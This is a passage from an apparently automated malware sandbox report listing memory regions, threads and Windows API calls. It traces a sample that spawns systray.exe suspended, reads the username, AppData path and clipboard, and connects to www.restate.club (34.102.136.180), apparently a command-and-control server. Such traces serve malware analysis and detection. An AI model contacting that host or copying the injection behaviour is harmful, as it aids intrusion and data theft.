0x7ffda8589fff monitored = 0 entry_point = 0x7ffda8581830 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 8623 start_va = 0x7ffda8690000 end_va = 0x7ffda86aefff monitored = 0 entry_point = 0x7ffda8695d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 8624 start_va = 0x7ffda8800000 end_va = 0x7ffda885bfff monitored = 0 entry_point = 0x7ffda8816f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 8625 start_va = 0x7ffda88b0000 end_va = 0x7ffda88c6fff monitored = 0 entry_point = 0x7ffda88b79d0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 8626 start_va = 0x7ffda89d0000 end_va = 0x7ffda89dafff monitored = 0 entry_point = 0x7ffda89d19a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 8627 start_va = 0x7ffda8a60000 end_va = 0x7ffda8a99fff monitored = 0 entry_point = 0x7ffda8a68d20 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 8628 start_va = 0x7ffda8aa0000 end_va = 0x7ffda8ac6fff monitored = 0 entry_point = 0x7ffda8ab0aa0 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 8629 start_va = 0x7ffda8bb0000 end_va = 0x7ffda8bdcfff monitored = 0 entry_point = 0x7ffda8bc9d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 8630 start_va = 0x7ffda8d60000 end_va = 0x7ffda8d88fff monitored = 0 entry_point = 0x7ffda8d74530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 8631 start_va = 0x7ffda8d90000 end_va = 0x7ffda8e28fff monitored = 0 entry_point = 0x7ffda8dbf4e0 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 8632 start_va = 0x7ffda8ed0000 end_va = 0x7ffda8ee3fff monitored = 0 entry_point = 0x7ffda8ed52e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 8633 start_va = 0x7ffda8ef0000 end_va = 0x7ffda8efffff monitored = 0 entry_point = 0x7ffda8ef56e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 8634 start_va = 0x7ffda8f00000 end_va = 0x7ffda8f4afff monitored = 0 entry_point = 0x7ffda8f035f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 8635 start_va = 0x7ffda8f50000 end_va = 0x7ffda8f5efff monitored = 0 entry_point = 0x7ffda8f53210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 8636 start_va = 0x7ffda9010000 end_va = 0x7ffda91d6fff monitored = 0 entry_point = 0x7ffda906db80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 8637 start_va = 0x7ffda91e0000 end_va = 0x7ffda9823fff monitored = 0 entry_point = 0x7ffda93a64b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 8638 start_va = 0x7ffda9850000 end_va = 0x7ffda9a37fff monitored = 0 entry_point = 0x7ffda987ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 8639 start_va = 0x7ffda9a40000 end_va = 0x7ffda9af4fff monitored = 0 entry_point = 0x7ffda9a822e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 8640 start_va = 0x7ffda9b90000 end_va = 0x7ffda9be4fff monitored = 0 entry_point = 0x7ffda9ba7970 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 8641 start_va = 0x7ffda9bf0000 end_va = 0x7ffda9c32fff monitored = 0 entry_point = 0x7ffda9c04b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 8642 start_va = 0x7ffda9c40000 end_va = 0x7ffda9ca9fff monitored = 0 entry_point = 0x7ffda9c76d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 8643 start_va = 0x7ffda9cb0000 end_va = 0x7ffdaa0d8fff monitored = 0 entry_point = 0x7ffda9cd8740 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 8644 start_va = 0x7ffdaa0e0000 end_va = 0x7ffdaa222fff monitored = 0 entry_point = 0x7ffdaa108210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 8645 start_va = 0x7ffdaa290000 end_va = 0x7ffdab7eefff monitored = 0 entry_point = 0x7ffdaa3f11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 8646 start_va = 0x7ffdab7f0000 end_va = 0x7ffdaba6cfff monitored = 0 entry_point = 0x7ffdab8c4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 8647 start_va = 0x7ffdabad0000 end_va = 0x7ffdabb7cfff monitored = 0 entry_point = 0x7ffdabae81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8648 start_va = 0x7ffdabb90000 end_va = 0x7ffdabcabfff monitored = 0 entry_point = 0x7ffdabbd02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 8649 start_va = 0x7ffdabcb0000 end_va = 0x7ffdabe09fff monitored = 0 entry_point = 0x7ffdabcf38e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 8650 start_va = 0x7ffdabe10000 end_va = 0x7ffdabed0fff monitored = 0 entry_point = 0x7ffdabe30da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 8651 start_va = 0x7ffdabf00000 end_va = 0x7ffdac055fff monitored = 0 entry_point = 0x7ffdabf0a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 8652 start_va = 0x7ffdac210000 end_va = 0x7ffdac27afff monitored = 0 entry_point = 0x7ffdac2290c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 8653 start_va = 0x7ffdac280000 end_va = 0x7ffdac326fff monitored = 0 entry_point = 0x7ffdac28b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 8654 start_va = 0x7ffdac330000 end_va = 0x7ffdac36afff monitored = 0 entry_point = 0x7ffdac3312f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 8655 start_va = 0x7ffdac370000 end_va = 0x7ffdac377fff monitored = 0 entry_point = 0x7ffdac371ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 8656 start_va = 0x7ffdac380000 end_va = 0x7ffdac426fff monitored = 0 entry_point = 0x7ffdac3958d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 8657 start_va = 0x7ffdac430000 end_va = 0x7ffdac5b5fff monitored = 0 entry_point = 0x7ffdac47ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 8658 start_va = 0x7ffdac6d0000 end_va = 0x7ffdac76cfff monitored = 0 entry_point = 0x7ffdac6d78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 8659 start_va = 0x7ffdac770000 end_va = 0x7ffdac7c1fff monitored = 0 entry_point = 0x7ffdac77f530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 8660 start_va = 0x7ffdac7e0000 end_va = 0x7ffdac83afff monitored = 0 entry_point = 0x7ffdac7f38b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 8661 start_va = 0x7ffdac840000 end_va = 0x7ffdac8aefff monitored = 0 entry_point = 0x7ffdac865f70 region_type = mapped_file name = "coml2.dll" filename = "\\Windows\\System32\\coml2.dll" (normalized: "c:\\windows\\system32\\coml2.dll") Region: id = 8662 start_va = 0x7ffdac8b0000 end_va = 0x7ffdaca70fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8745 start_va = 0xe4a0000 end_va = 0xfff7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000e4a0000" filename = "" Region: id = 8752 start_va = 0x7d00000 end_va = 0x7da1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007d00000" filename = "" Region: id = 8754 start_va = 0x10000000 end_va = 0x1007ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010000000" filename = "" Region: id = 8755 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "s-1-5-21-1560258661-3990802383-1811730007-1000.pckgdep" filename = "\\ProgramData\\Microsoft\\Windows\\AppRepository\\Packages\\windows.immersivecontrolpanel_6.2.0.0_neutral_neutral_cw5n1h2txyewy\\S-1-5-21-1560258661-3990802383-1811730007-1000.pckgdep" (normalized: "c:\\programdata\\microsoft\\windows\\apprepository\\packages\\windows.immersivecontrolpanel_6.2.0.0_neutral_neutral_cw5n1h2txyewy\\s-1-5-21-1560258661-3990802383-1811730007-1000.pckgdep") Region: id = 8756 start_va = 0x7ffda7710000 end_va = 0x7ffda7718fff monitored = 0 entry_point = 0x7ffda7711840 region_type = mapped_file name = "ploptin.dll" filename = "\\Windows\\System32\\ploptin.dll" (normalized: "c:\\windows\\system32\\ploptin.dll") Region: id = 8757 start_va = 0x7ffd9ce70000 end_va = 0x7ffd9ce8afff monitored = 0 entry_point = 0x7ffd9ce7af40 region_type = mapped_file name = "capauthz.dll" filename = "\\Windows\\System32\\capauthz.dll" (normalized: "c:\\windows\\system32\\capauthz.dll") Region: id = 8758 start_va = 0x10080000 end_va = 0x100fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010080000" filename = "" Region: id = 8759 start_va = 0x400000 end_va = 0x401fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "s-1-5-21-1560258661-3990802383-1811730007-1000.pckgdep" filename = "\\ProgramData\\Microsoft\\Windows\\AppRepository\\Packages\\Microsoft.WindowsStore_2015.10.13.0_x64__8wekyb3d8bbwe\\S-1-5-21-1560258661-3990802383-1811730007-1000.pckgdep" (normalized: "c:\\programdata\\microsoft\\windows\\apprepository\\packages\\microsoft.windowsstore_2015.10.13.0_x64__8wekyb3d8bbwe\\s-1-5-21-1560258661-3990802383-1811730007-1000.pckgdep") Region: id = 8760 start_va = 0x7df5ffe40000 end_va = 0x7df5ffebdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\apppatch64\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\apppatch64\\sysmain.sdb") Region: id = 8761 start_va = 0x7ffda7710000 end_va = 0x7ffda7718fff monitored = 0 entry_point = 0x7ffda7711840 region_type = mapped_file name = "ploptin.dll" filename = "\\Windows\\System32\\ploptin.dll" (normalized: "c:\\windows\\system32\\ploptin.dll") Thread: id = 294 os_tid = 0xc34 Thread: id = 295 os_tid = 0x2f4 Thread: id = 296 os_tid = 0x744 Thread: id = 297 os_tid = 0xa2c Thread: id = 298 os_tid = 0x868 Thread: id = 299 os_tid = 0x864 Thread: id = 300 os_tid = 0x874 Thread: id = 301 os_tid = 0xa00 Thread: id = 302 os_tid = 0x878 Thread: id = 303 os_tid = 0x9c4 Thread: id = 304 os_tid = 0x97c Thread: id = 305 os_tid = 0x650 Thread: id = 306 os_tid = 0x610 Thread: id = 307 os_tid = 0x608 Thread: id = 308 os_tid = 0xb0c Thread: id = 309 os_tid = 0xb08 Thread: id = 310 os_tid = 0xb04 Thread: id = 311 os_tid = 0x94c Thread: id = 312 os_tid = 0x8f4 Thread: id = 313 os_tid = 0x44c Thread: id = 314 os_tid = 0x410 Thread: id = 315 os_tid = 0x7ec Thread: id = 316 os_tid = 0x7e8 Thread: id = 317 os_tid = 0x7d4 Thread: id = 318 os_tid = 0x7d0 Thread: id = 319 os_tid = 0x7cc Thread: id = 320 os_tid = 0x7c4 Thread: id = 321 os_tid = 0x7c0 Thread: id = 322 os_tid = 0x7ac Thread: id = 323 os_tid = 0x7a8 Thread: id = 324 os_tid = 0x7a4 Thread: id = 325 os_tid = 0x7a0 Thread: id = 326 os_tid = 0x798 Thread: id = 327 os_tid = 0x794 Thread: id = 328 os_tid = 0x790 Thread: id = 329 os_tid = 0x788 Thread: id = 330 os_tid = 0x77c Thread: id = 331 os_tid = 0x774 Thread: id = 332 os_tid = 0x770 Thread: id = 333 os_tid = 0x76c Thread: id = 334 os_tid = 0x768 Thread: id = 335 os_tid = 0x764 Thread: id = 336 os_tid = 0x75c Thread: id = 337 os_tid = 0x754 Thread: id = 338 os_tid = 0x750 Thread: id = 339 os_tid = 0x74c Thread: id = 340 os_tid = 0x748 Thread: id = 341 os_tid = 0x744 Thread: id = 342 os_tid = 0x740 Thread: id = 343 os_tid = 0x73c Thread: id = 344 os_tid = 0x734 Thread: id = 345 os_tid = 0x730 Thread: id = 346 os_tid = 0x724 Thread: id = 347 os_tid = 0x70c Thread: id = 348 os_tid = 0x708 Thread: id = 349 os_tid = 0x704 Thread: id = 350 os_tid = 0x700 Thread: id = 351 os_tid = 0x6f4 Thread: id = 352 os_tid = 0x6f0 Thread: id = 353 os_tid = 0x6e8 Thread: id = 354 os_tid = 0x6e4 Thread: id = 355 os_tid = 0x6e0 Thread: id = 356 os_tid = 0x6dc Thread: id = 357 os_tid = 0x6d4 Thread: id = 358 os_tid = 0x6d8 Thread: id = 359 os_tid = 0x6d0 Thread: id = 360 os_tid = 0x6cc Thread: id = 361 os_tid = 0x6ac Thread: id = 362 os_tid = 0x6a8 Thread: id = 363 os_tid = 0x6a4 Thread: id = 364 os_tid = 0x694 Thread: id = 365 os_tid = 0x684 Thread: id = 366 os_tid = 0x680 [0278.534] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Windows\\SysWOW64\\systray.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x800000c, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0xcf928*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xcf900, hNewToken=0x0 | out: lpProcessInformation=0xcf900*(hProcess=0x1554, hThread=0x1654, dwProcessId=0xd14, dwThreadId=0xd18), hNewToken=0x0) returned 1 [0290.694] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0xcf5a0 | out: HeapArray=0xcf5a0*=0x4c0000) returned 0x4 [0290.702] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x3da0) returned 0x9cebd80 [0290.717] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0xcf380 | out: Value="RDhJ0CNFevzX") returned 0x0 [0290.766] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0xcf5a0 | out: HeapArray=0xcf5a0*=0x4c0000) returned 0x4 [0290.774] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x4000) returned 0x9cb5da0 [0290.830] LdrGetProcedureAddress (in: BaseAddress=0x7ffdaa0e0000, Name="CoUninitialize", Ordinal=0x0, ProcedureAddress=0xcf810 | out: ProcedureAddress=0xcf810*=0x7ffdab851540) returned 0x0 [0290.834] LdrGetProcedureAddress (in: BaseAddress=0x7ffdaa0e0000, Name="CoInitializeEx", Ordinal=0x0, ProcedureAddress=0xcf810 | out: ProcedureAddress=0xcf810*=0x7ffdab852c50) returned 0x0 [0290.838] LdrGetProcedureAddress (in: BaseAddress=0x7ffdaa0e0000, Name="CoCreateInstance", Ordinal=0x0, ProcedureAddress=0xcf810 | out: ProcedureAddress=0xcf810*=0x7ffdab88fb70) returned 0x0 [0290.914] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0xcf100 | out: Value="RDhJ0CNFevzX") returned 0x0 [0290.928] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="APPDATA", Value=0xcf400 | out: Value="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0291.020] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xcf3de, cbSize=0xcf3b0 | out: pszUAOut="Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko", cbSize=0xcf3b0) returned 0x0 [0291.232] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0xcf7b0 | out: lpWSAData=0xcf7b0) returned 0 [0291.235] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x7d1c7d5, lpParameter=0x7d21636, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x8b4 Thread: id = 370 os_tid = 0xda8 [0291.255] Sleep (dwMilliseconds=0x1388) [0296.287] OpenClipboard (hWndNewOwner=0x0) returned 1 [0296.289] GetClipboardData (uFormat=0xd) returned 0x0 [0296.290] CloseClipboard () returned 1 [0296.318] socket (af=2, type=1, protocol=6) returned 0x113c [0296.321] getaddrinfo (in: pNodeName="www.restate.club", pServiceName="80", pHints=0x9cebdc8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x9cebdf8 | out: ppResult=0x9cebdf8*=0x8b26400*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x9c1c4a0*(sa_family=2, sin_port=0x50, sin_addr="34.102.136.180"), ai_next=0x0)) returned 0 [0299.584] htons (hostshort=0x50) returned 0x5000 [0299.584] connect (s=0x113c, name=0x9c1c4a0*(sa_family=2, sin_port=0x50, sin_addr="34.102.136.180"), namelen=16) Thread: id = 371 os_tid = 0xdd0 Process: id = "97" image_name = "systray.exe" filename = "c:\\windows\\syswow64\\systray.exe" page_root = "0x530a1000" os_pid = "0xd14" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "96" os_parent_pid = "0x67c" cmd_line = "\"C:\\Windows\\SysWOW64\\systray.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00010306" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8675 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 8676 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 8677 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 8678 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 8679 start_va = 0xa0000 end_va = 0xdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 8680 start_va = 0xe0000 end_va = 0xe3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 8681 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 8682 start_va = 0x100000 end_va = 0x101fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 8683 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 8684 start_va = 0xbc0000 end_va = 0xbc5fff monitored = 0 entry_point = 0xbc1510 region_type = mapped_file name = "systray.exe" filename = "\\Windows\\SysWOW64\\systray.exe" (normalized: "c:\\windows\\syswow64\\systray.exe") Region: id = 8685 start_va = 0xbd0000 end_va = 0x4bcffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bd0000" filename = "" Region: id = 8686 start_va = 0x77ce0000 end_va = 0x77e5afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 8687 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 8688 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8689 start_va = 0x7fff0000 end_va = 0x7dfdac8affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 8690 start_va = 0x7dfdac8b0000 end_va = 0x7ffdac8affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfdac8b0000" filename = "" Region: id = 8691 start_va = 0x7ffdac8b0000 end_va = 0x7ffdaca70fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8692 start_va = 0x7ffdaca71000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffdaca71000" filename = "" Region: id = 8694 start_va = 0x110000 end_va = 0x138fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 8696 start_va = 0xbc0000 end_va = 0xbc5fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bc0000" filename = "" Region: id = 8697 start_va = 0x4c0000 end_va = 0x4cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 8698 start_va = 0x656d0000 end_va = 0x6571ffff monitored = 0 entry_point = 0x656e8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 8699 start_va = 0x65720000 end_va = 0x65799fff monitored = 0 entry_point = 0x65733290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 8700 start_va = 0x776a0000 end_va = 0x7777ffff monitored = 0 entry_point = 0x776b3980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 8701 start_va = 0x657a0000 end_va = 0x657a7fff monitored = 0 entry_point = 0x657a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 8702 start_va = 0x4d0000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 8703 start_va = 0x776a0000 end_va = 0x7777ffff monitored = 0 entry_point = 0x776b3980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 8704 start_va = 0x75220000 end_va = 0x7539dfff monitored = 0 entry_point = 0x752d1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 8705 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 8706 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 8707 start_va = 0x140000 end_va = 0x1fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8708 start_va = 0x75b50000 end_va = 0x75c96fff monitored = 0 entry_point = 0x75b61cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 8709 start_va = 0x75cb0000 end_va = 0x75dfefff monitored = 0 entry_point = 0x75d66820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 8710 start_va = 0x400000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8711 start_va = 0x440000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 8712 start_va = 0x75e00000 end_va = 0x75ebdfff monitored = 0 entry_point = 0x75e35630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 8713 start_va = 0x480000 end_va = 0x4a9fff monitored = 0 entry_point = 0x485680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 8714 start_va = 0x690000 end_va = 0x817fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 8715 start_va = 0x779d0000 end_va = 0x779fafff monitored = 0 entry_point = 0x779d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 8716 start_va = 0x820000 end_va = 0x9a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000820000" filename = "" Region: id = 8717 start_va = 0x4bd0000 end_va = 